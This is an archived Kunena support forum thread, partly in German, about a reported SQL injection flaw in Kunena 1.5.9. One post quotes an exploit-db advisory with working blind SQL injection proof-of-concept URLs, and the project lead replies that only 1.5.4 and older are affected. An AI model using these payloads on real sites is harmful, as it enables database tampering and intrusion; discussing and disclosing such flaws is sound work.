×
Kunena 5.2.2 released (13 Jan 2021)

The Kunena team has announce the arrival of Kunena 5.2.2 [K 5.2.2] which is now available for download as a native Joomla extension for J! 3.9.x. This version addresses most of the issues that were discovered in K 5.2 and issues discovered during the development stages of K 5.2.2

× Themen, die in diesen Bereich verschoben wurden, gelten allgemein als beendet. Falls es dazu noch zusätzliche Fragen gibt, können diese gestellt werden.
Aber diese alten Themen sollten auf keinen Fall wieder auferstehen, um neue Probleme zu erörtern. Eröffnet dazu bitte ein eigenes neues Thema.

Question [erledigt] Sicherheitsproblem in der neuen 1.5.9 Version ! ?

More
10 years 11 months ago - 10 years 10 months ago #1 by C.A.M
Hallo Kunenacommunity,

leider wurde ich heute im Joomlaportal.de auf eine Sicherheitslücke in der neuen Kunenaversion 1.5.9 aufmerksam gemacht ! :woohoo:

Was soll nun getan werden ?

Im Joomlaportalchat, wurde mir geraten das Forum zu Deaktivieren ! ? :S

Zur Zeit sichere ich gerade alles um eventuell die Version 1.5.8 wieder zu Instalieren!

Den Bericht könnt Ihr euch HIER einmal ansehen.

MfG, C.A.M .
Last edit: 10 years 10 months ago by rich.

Please Log in or Create an account to join the conversation.

More
10 years 11 months ago #2 by Hurr1c4n3

Please Log in or Create an account to join the conversation.

More
10 years 11 months ago #3 by peripsum
autsch und das nachdem ich heut nacht geupdatet habe :(

Please Log in or Create an account to join the conversation.

More
10 years 11 months ago #4 by LittleJohn
This is relevant for all of kunena.
Can we maybe do this thread in english?

Please Log in or Create an account to join the conversation.

More
10 years 11 months ago #5 by helmchen

# Title: Joomla Component com_kunena Blind SQL Injection Vulnerability
# EDB-ID: 11279
# CVE-ID: ()
# OSVDB-ID: ()
# Author: B-HUNT3|2
# Published: 2010-01-28
# Verified: no
# Download Exploit Code
# Download N/A

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> TITLE: Joomla (com_kunena) BLIND SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: LocalHost

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Input var do is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 1.5.9 but probably other versions also
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOF OF CONCEPT:

[~]>> https://[HOST]/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=[SQL]

[~]>> {RETURN TRUE::RETURN FALSE} ---> VIEW TIME RESPONSE ||| HIGH: TRUE ||| LOW: FALSE

[~]>> https://server/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=show', link='0wn3d', task='0wn3d' WHERE userid=62 AND 1=if(substring(@@version,1,1)=5,benchmark(999999,md5(@@version)),1)/*
[~]>> https://server/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=show', link='0wn3d', task='0wn3d' WHERE userid=62 AND 1=if(substring(@@version,1,1)=4,benchmark(999999,md5(@@version)),1)/*

[~]>> Note: There are more affected vars.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...


www.exploit-db.com/exploits/11279

Please Log in or Create an account to join the conversation.

More
10 years 11 months ago #6 by C.A.M
Kann jemand mal BITTE diesen Buchstabensalat übersetzen. :S

Was ist da genau das Problem und wie soll nun vorgegangen werden?

Der eine meint das man besser das Forum Deaktivieren sollte, ein ander meint das es besser währe das Forum zu Deinstallieren und wieder ein anderer meint, Dont Panick !

Bei Sicherheits Geschichten gerate ich jedoch sehr schnell in Panik, auch wenn meine Seite noch nicht so viele Besucher täglich hat wie ich es gerne hätte, heist das ja noch lange nicht das es mich bei meinem Glück nicht treffen könnte. :blink:

Ich habe mein Forum erst einmal bis auf weiteres nur Deaktiviert, weil es bei einer Deinstallation meine Seite in eine Fehlermeldung vewandelt. Weshalb das so ist weis ich noch nicht. :woohoo:

MfG, C.A.M .

Please Log in or Create an account to join the conversation.

More
10 years 11 months ago - 10 years 11 months ago #7 by fxstein
Hallo allerseits!

Wir sind gestern auf die vermeidliche Sicherheitsluecke aufmerksam gemacht worden.

Innerhalb von 2-3 Stunden haben wir 1.5.4 , 1.5.5, 1.5.6, 1.5.7, 1.5.8 & 1.5.9 gestsest.

Alle offiziellen Kunena versionen seit 1.5.5 haben den fix eingebaut. Wir haben sogar kunena.com mit der Attacke getestet.

Die Attacke funktioniert nur gegen alter Kunena 1.5.4 (und aelter aber wirklich gegen ALLE Fireboard Versionen).

Wir haben diesen Bug vor Monaten gefixed und mit 1.5.5 ausgeliefert.

1.5.9 hat dieses problem nicht.

Wir haben umgehend den Author des Alerts als auch packetstorm von diesen Fakten informiert, aber leider von niemandem eine Antwort bekommen.



Hi everybody,

We were made aware of this alleged security vulnerability within a few hours of it hitting packetstorm.

Within 2-3 hours we tested 1.5.4, 1.5.5, 1.5.6, 1.5.7, 1.5.8 and 1.5.9.

Every official distribution since 1.5.5 has the fix built in. We even ran the attack against kunena.com itself.

The vulnerability is only present in versions of Kunena 1.5.4 (and older and ALL versions of Fireboard)

We have fixed this old Fireboard issue months ago.

We immediately contacted the author of the alert as well as packetstorm but have not gotten a response from either one.


fxstein
Kunena project lead

We love stars on the Joomla Extension Directory . :-)
Last edit: 10 years 11 months ago by fxstein.

Please Log in or Create an account to join the conversation.

More
10 years 11 months ago #8 by C.A.M
Hallo fxstein,

das freut mich das dies ein Fehlalarm gewesen ist ! :P

Da dies ja nun geklärt ist, können wir ja alle unser Forum wieder aktivieren und heute Abend wieder ruhig schlafen gehen. ;)

Dennoch würde ich gerne wissen, was das für ein Fehler ist und was im schlimmsten Fall hätte passieren können.

VIELEN dank für die schnelle Entwarnung !

MfG, C.A.M .

Please Log in or Create an account to join the conversation.

  • Not Allowed: to create new topic.
  • Not Allowed: to reply.
  • Not Allowed: to edit your message.
Time to create page: 0.097 seconds